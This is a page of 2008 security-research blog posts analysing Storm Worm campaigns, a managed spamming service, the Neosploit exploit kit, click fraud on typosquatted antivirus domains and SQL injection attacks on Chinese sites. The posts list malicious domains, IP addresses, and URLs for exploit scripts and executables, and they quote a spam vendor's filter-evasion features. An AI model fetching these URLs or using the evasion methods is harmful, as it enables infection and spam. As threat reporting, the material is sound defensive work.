33. Storm Worm's Lazy Summer Campaigns -

Looks like a "cybercrime intern" launched this campaign, lacking any of the usual Storm Worm evasive practices, no exploitation of client side vulnerabilities, as well as no survivability offered by their usual fast-flux nodes. Continue reading →

Storm Worm's Lazy Summer Campaigns

The Storm Worm-ers seem to be lacking their usual creativity in respect to the usual social engineering attacks taking advantage of the momentum we're used to seeing. These days they're not piggybacking on real news items, they're starting to come up with new ones.



Storm's latest "FBI vs Facebook" campaign is an example of very badly executed one, lacking their usual fast-flux, any kind of social engineering common sense,  as well as client side exploits next to centralizing all the participating domains on a single nameserver.

Domains used :

wapdailynews .com

smartnewsradio .com

bestvaluenews .com

toplessnewsradio .com

companynewsnetwork .com

goodnewsgames .com

marketgoodnews .com

fednewsworld .com

toplessdailynews .com

stocklownews .com



DNS servers :

NS.BRPRBGOK6 .COM

NS2.BRPRBGOK6 .COM

NS3.BRPRBGOK6 .COM 

NS4.BRPRBGOK6 .COM

NS5.BRPRBGOK6 .COM

NS6.BRPRBGOK6 .COM



Strangely, the domain has been registered using an email hosted on a known Storm fast-flux node used in the recent 4th of July campaign and the U.S's invasion of Iran :



Administrative Contact:

Lee Chung lee@likethisone1.com

+13205897845 fax:

1743, 34

Los-Angeles CA 321458

us



This Storm Worm sample is also "phoning back home" over HTTP next to the P2P traffic, and trying to obtain the rootkit from the now down, policy-studies.cn /getbackup.php using already known Storm nameservers :



ns2.verynicebank .com

ns3.verynicebank .com

ns.likethisone1 .com

ns2.likethisone1 .com

ns3.lollypopycandy .com

ns4.lollypopycandy .com



Someone's bored, definitely, making it look like it's almost someone else managing a Storm Worm campaign on behalf of them. Continue reading →

Dissecting a Managed Spamming Service

With cybercrime getting easier to outsource these days, and with the overall underground economy's natural maturity from products to services, "managed spamming appliances" and managed spamming services are becoming rather common. Increasingly, these "vendors" are starting to "vertically integrate", namely, start diversifying the portfolio of services they offer in order to steal market share from other "vendors" offering related services like, email database cleaning, segmentation of email databases, email servers or botnets whose hosts have a pre-checked and relatively clean IP reputation, namely they're not blacklisted yet.



How much does it cost to send 1 million spam emails these days? According to a random spamming service, $100 excluding the discounts based on the speed of sending desired, namely 10-20 per second or 20-30 per second. Let's dissect the service, and emphasize on its key differentiation factors, as well as the customerization offered in the form of a dedicated server if the customer would like to send billions of emails :



"-- High quality and percentage of spam delivery 

-- Fast speed of delivery

-- Spam database on behalf of the vendor, or using your own database of harvested emails

-- Easily obtainable and segmented spam databases on per country basis

-- Randomization of the spam email's body and headers in order to achieve a higher delivery rate

-- Support for attachments, executables, and image files



The cost - $100 for a million for letters delivered spam, with the large volume of spam discounts 20% -30% -40% based on the value-added Do-it-yourself customer interfare based on a multi-user botnet command and control interface :

 

-- Automatic RBL verification

-- Support for many subjects, headers,

-- Total customization of the email sending process

-- Autogenerating junk content next to the spammers email/link in order to bypass filtering

-- Faking Outlook Message ID / Boundary / Content-ID

-- Interface added. Now do not necessarily understand all the features into the system to start the list.

-- Convenient management tasks.

-- A high percentage of punching, on the basis of good europe - 40-60% (For the United States - less because there aol and others).

-- Improved metrics, whether or not the emails have been sent, lost, unknown receipt, or have been RBL-ed



With the weight of a billion - even discounts and the possibility of making a personal server. "



Rather surprising, they state that European email users have a higher probability of receiving the spam message compared the U.S due to AOL. What they're actually trying to say is due to AOL's use of Domain Keys Identified Mail (DKIM). As far as localization of the spam to the email owner's native language is concerned, this segmentation concept has been take place for over an year now.



This service, like the majority of others rely entirely on malware infected hosts, which due to the multi-user nature of most of the malware command and control interfaces, allows them to easily add customers and set their privileges based on the type of service that they purchase. This leaves a countless number of opportunities for targeted spamming, and yes, spear phishing attacks made possible due to the segmentation of the emails based on a country, city, even company.



In the long term, the people behind spamming providers, web malware exploitation kits and DIY phishing kits, will inevitably start introducing built-in features which were once available through third-party services. For instance, hosting infrastructure for the spam/phishing/live exploit URLs, or even managed fast-flux infrastructure, have the potential to become widely available if such optional features get built-in phishing kits, or start getting offered by the spamming provider itself. And since the affiliate based model seems to be working just fine, the ongoing underground consolidation will converge providers of different underground goods and services, where everyone would be driving customers to one another's services and earning revenue in the process. Continue reading →

Neosploit Team Leaving the IT Underground

The Neosploit Team are abandoning support for their Neosploit web exploitation malware kit, citing a negative return on investment as the main reason behind their decision. However, given Neosploit's open source nature just like the majority of web malware kits, and the fact that it's slowly, but surely turning into a commodity malware kit just like MPack and Icepack did, greatly contribute to its extended "product lifecycle" :



"Let’s discuss their business model, how other cybercriminals disintermediated it thereby ruining it, and most importantly, how is it possible that such a popular web malware exploitation kit cannot seem to achieve a positive return on investment (ROI). The short answer is - piracy in the IT underground, and their over-optimistic assumption that high-profit margins can compensate the lack of long-term growth strategy, which in respect to web malware exploitation kits has do with the benefits coming from converging with traffic management tools. Let’s discuss some key points."



The end of Neosploit malware kit, doesn't mean the end of Neosploit Team, or the sudden migration to other malware kits since they're no longer providing support in the form of new obfuscations and set of exploits to their customers. Their customers have been in fact self-servicing their needs enjoying the modular nature of the kit, the result of which is an unknown number of modified Neosploit kits.



Related posts:

The Underground Economy's Supply of Goods and Services

The Dynamics of the Malware Industry - Proprietary Malware Tools 

Localizing Cybercrime - Cultural Diversity on Demand 

E-crime and Socioeconomic Factors 

Localizing Open Source Malware 

Coding Spyware and Malware for Hire

The FirePack Exploitation Kit Localized to Chinese

MPack and IcePack Localized to Chinese

The Icepack Exploitation Kit Localized to French  Continue reading →

Over 80 percent of Storm Worm Spam Sent by Pharmaceutical Spam Kings

It used to be a case where a botnet would be used for a single purpose, spamming, phishing, or malware spreading. At a later stage, the steady supply of malware infected allowed botnet masters more opportunities to "sacrifice" the clean IP reputation and engage in several malicious activities simultaneously - today's underground multitasking improving the monetization of what used to be commodity goods and services.



Today, a botnet will not only be sending out phishing emails, automatically SQL inject vulnerable sites across the web, but also, provide fast-flux infrastructure to money mule recruitment services, all of this for the sake of optimizing the efficiency provided by the botnet in general. This optimization makes it possible for a single botnet to be partitioned and access it it sold and resold so many times, that it would be hard to keep track of all the malicious activities it participates in. Cybercrime in between on multiple fronts using a single botnet is only starting to take place as concept.



That's the case with Stormy Wormy, according to IronPort whose "Researchers Link Storm Botnet to Illegal Pharmaceutical Sales" :



"Our previous research revealed an extremely sophisticated supply chain behind the illegal pharmacy products shipped after orders were placed on botnet-spammed Canadian pharmacy websites. But the relationship between the technology-focused botnet masters and the global supply chain organizations was murky until now," said Patrick Peterson, vice president of technology at IronPort and a Cisco fellow. "Our research has revealed a smoking gun that shows that Storm and other botnet spam generates commissionable orders, which are then fulfilled by the supply chains, generating revenue in excess of (US)$150 million per year."



Murky until now? I can barely see anything around me due to all the smoke coming from the smoking guns of who's what, what's when, and who's done what with who, especially in respect to Storm Worm whose multitasking on different fronts in the first stages of their appearance online made it possible to establish links between several different malware groups and the "upstream hosting providers", until the botnet scaled enough making it harder to keep track of all of their activities.



The Storm Worm-ers themselves aren't sending out pharma spam, the customers to whom they've sold access to parts of Storm Worm are the ones sending the pharma spam. Here's a brief analysis published in May - "Storm Worm Hosting Pharmaceutical Scams". What's in it for the scammers? Income based on a revenue-sharing affiliate program, a pharmacy affiliate program has been around for several years :



"This criminal organization recruits botnet spamming partners to advertise their illegal pharmacy websites, which receive a 40 percent commission on sales orders. The organization offers fulfillment of the pharmaceutical product orders, credit card processing and customer support services"



What's coming out of Storm Worm's botnet isn't necessarily coming from the hardcore Storm Worm-ers whose job today is more of a campaign-rotation related in order to ensure new bots are added, what's coming out of Storm Worm is coming from those using the access they've purchased to a part of the botnet.



Related posts:

Storm Worm Hosting Pharmaceutical Scams

All You Need is Storm Worm's Love

Social Engineering and Malware

Storm Worm Switching Propagation Vectors

Storm Worm's use of Dropped Domains

Offensive Storm Worm Obfuscation

Storm Worm's Fast Flux Networks

Storm Worm's St. Valentine Campaign

Storm Worm's DDoS Attitude

Riders on the Storm Worm

The Storm Worm Malware Back in the Game Continue reading →

Click Fraud, Botnets and Parked Domains - All Inclusive

It gets very ugly when someone owns both, the botnet, and the portfolio of parked domains actively participating in PPC (pay per click) advertising programs, where the junk content, or the typosquatted domain names is aiming to attract high value and expensive keywords in order for the scammer to year higher on per click percentage. This is among the very latest tactics applied by those engaging in click fraud. Hypothetically, the cost to rent the botnet and commit click fraud would be cheaper than sharing revenue on per click basis with "human clickers" who earn money based on how many ads they click given a set of scammer's owned sites, where the customer supports represents a DIY proxy switching application changing their IP on the fly.



Click Forensics's recent Q2 2008 report indicates that botnets were responsible for over 25% of all click fraud activity they were monitoring during Q2. Not surprising, given that botnets have long been observed to commit blick fraud, using a common traffic exchange scheme. What's new is the use and abuse of parked domains :



"Despite indication that some of the clicks from parked domains were invalid, Google failed to disclose to the plaintiff specific domain names in which these ads were clicked on, making detection of invalid clicks difficult and even worse concealing any evidence of invalid clicks," the lawsuit alleges. RK West eventually went through its server logs and discovered the source of the clicks, said Alfredo Torrijos, one of the company's attorneys."

Cybersquatting security vendors in order to improve the chances of attracting high-valued keywords to later on commit click fraud on the parked domains, now showing relevant security ads, is nothing new. The trend has been pretty evident for a while, with cybersquatting increasing on an yearly basis according to multiple sources :



"Rise in pay-per-click advertising where cybersquatters link the domain name they have registered with a website containing ads promoting a variety of competing brands.  The cybersquatter receives money every time internet users access this website and click on one of the ads."



However, the "internet users who are supposed to click on one of the ads on the parked domains owned by the scammers" will get clicked by a botnet owned or cost-effectively rented by the scammer. Here's a sample of currently parked domains attracting Symantec ads :



symentec .com

symantek .com

symanteck .com

symantac .com

symantaec .com

symantic .com

symmantec .com

symanntec .com

ssymantec .com

symanthec .com

symanzec .com

symanttec .com

sjmantec .com

saimantec .com

seymantec .com

symanrec .com

symantrc .com

symantwc .com

aymantec .com

dymantec .com

sxmantec .com

symantex .com

symantev .com

symabtec .com

symamtec .com

synantec .com

stmantec .com

symanyec .com

sumantec .com

symant3c .com

syman5ec .com

wwwsymantec .com

symanteccom .com

ymantec .com

syantec .com

symntec .com

symanec .com

symantc .com

symante .com

symattec .com

symantcc .com

syman-tec .com

syymantec .com

symaantec .com

symanteec .com

symantecc .com

ysmantec .com

syamntec .com

symnatec .com

symatnec .com

symanetc .com

symantce .com



As well as recent sample brandjacking Kaspersky :

kespersky .com

kasparsky .com

kaspaersky .com

kaspasky .com

kasperscky .com

gaspersky .com

kasbersky .com

kasppersky .com

kasperrsky .com

kasperssky .com

kasperskj .com

kasperskey .com

kaapersky .com

kasperaky .com

kasperdky .com

laspersky .com

kaspersly .com

kasperskt .com

kaspersku .com

kasp3rsky .com

kaspe4sky .com

kas0ersky .com

wwwkasperskycom .com

wwwkaspersky .com

kasperskycom .com

aspersky .com

kspersky .com

kasersky .com

kaspesky .com   

kaspersy .com

kaspersk .com

kappersky .com

kaspessky .com

kas-persky .com

kasp-ersky .com

kasper-sky .com

kasperskyy .com

akspersky .com

ksapersky .com

kapsersky .com

kaseprsky .com

kaspesrky .com   

kaspersyk .com

kaspersky24 .com

kasperskyonline .com

kaspersky-online .com

What's most disturbing is that instead of having cybersquatting taken care take of a long time ago, so that scammers would need to emphasize on the junk content in order to attract the relevant ads on the bogus domains, cybersquatting still does the magic by including the targeted word in the domain name itself, so that no junk content generation courtesy of a blackhat SEO tool is needed.



Related posts:

Cybersquatting Security Vendors for Fraudulent Purposes

Cybersquatting Symantec's Norton AntiVirus

The State of Typosquatting - 2007 Continue reading →

Smells Like a Copycat SQL Injection In the Wild

In between the massive SQL injections, that as a matter of fact remain ongoing, copycats taking advantage of the very same SQL injection tools using public search engine's indexes as a reconnaissance tools, are also starting to take advantage of localized and targeted attacks, attacking specific online communities. Among these is mx.content-type.cn /day.js using day.js to attempt multiple exploitation using publicly obtainlable exploits such as Adodb.Stream, MPS.StormPlayer, DPClient.Vod, IERPCtl.IERPCtl.1, GLIEDown.IEDown.1, and targeting primarily Chinese web communities.



Compared to a bit more sophisticated attack tactics applied by Chinese hackers, taking advantage of localized versions of the de facto web malware exploitation kits, those who don't have access to such continue using cybercrime 1.0 DIY exploit embedding tools at large. The rest of the SQL injected domains as well as the exploits themselves are parked on the same plaee - 222.216.28.25, also responding to :



down.goodnetads .org

ads.goodnetads .org

real.kav2008 .com

hk.www404 .cn

err.www404 .cn

mx.content-type .cn

sun.63afe561 .info

ads.633f94d3 .info

ads.1234214 .info

ad.50db34d5 .info

ads.50db34d5 .info

ad.8d77b42a .info

web.adsidc .info

free.idcads .info

free.cjads .info

ads.adslooks .info

list.adslooks .info

ad.5iyy .info



The SQL injected domains :

ads.633f94d3.info/day .js

ad.8d77b42a.info/day .js

ad.5iyy.info/day .js

free.idcads.info/day .js

efreesky.com/day .js

v.freefl.info/day .js



The internal structure :

free.idcads.info/f/index .htm

free.idcads.info/014 .htm

free.idcads.info/real11 .htm

free.idcads.info/real10 .htm

free.idcads.info/lz .htm

free.idcads.info/bf .htm

free.idcads.info/kong .htm

free.idcads.info/f/swfobject .js

ad.50db34d5.info//rm%5C/rm .exe



Parked domains responding to the command and control locations, 60.191.223.76 and 222.216.28.100 :

ftp.gggjjj .info

live.ads002 .net

log.goodnetads .org

dat.goodnetads .org

root.51113 .com

sun.update999 .cn

abb.633f94d3 .info

up.50db34d5 .info

web.cn3721 .org   

dat.goodnetads .org

cs.rm510 .com

sb.sb941 .com

k.sb941 .com

info.sb941 .com

day.sb941 .com

post.ad9178 .com

v.91tg .net



Centralizing their scammy ecosystem always makes it easier to monitor, keep track of, and of course, expose.



Related posts:

SQL Injecting Malicious Doorways to Serve Malware

Yet Another Massive SQL Injection Spotted in the Wild

Malware Domains Used in the SQL Injection Attacks

SQL Injection Through Search Engines Reconnaissance

Google Hacking for Vulnerabilities

Fast-Fluxing SQL injection attacks executed from the Asprox botnet

Sony PlayStation's site SQL injected, redirecting to rogue security software

Redmond Magazine Successfully SQL Injected by Chinese Hacktivists Continue reading →